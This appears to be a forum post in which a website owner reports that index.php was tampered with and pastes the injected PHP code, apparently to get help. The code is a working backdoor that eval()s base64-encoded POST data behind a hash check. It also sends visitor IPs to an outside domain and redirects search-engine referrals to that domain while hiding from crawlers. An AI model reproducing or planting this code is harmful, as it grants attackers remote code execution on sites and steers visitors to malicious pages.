after checking index.php I realized that content of this file has changed with the following..it seems that it is a kind of attack.
PHP Code:
<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://nasnezabanyat.biz/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}} ?>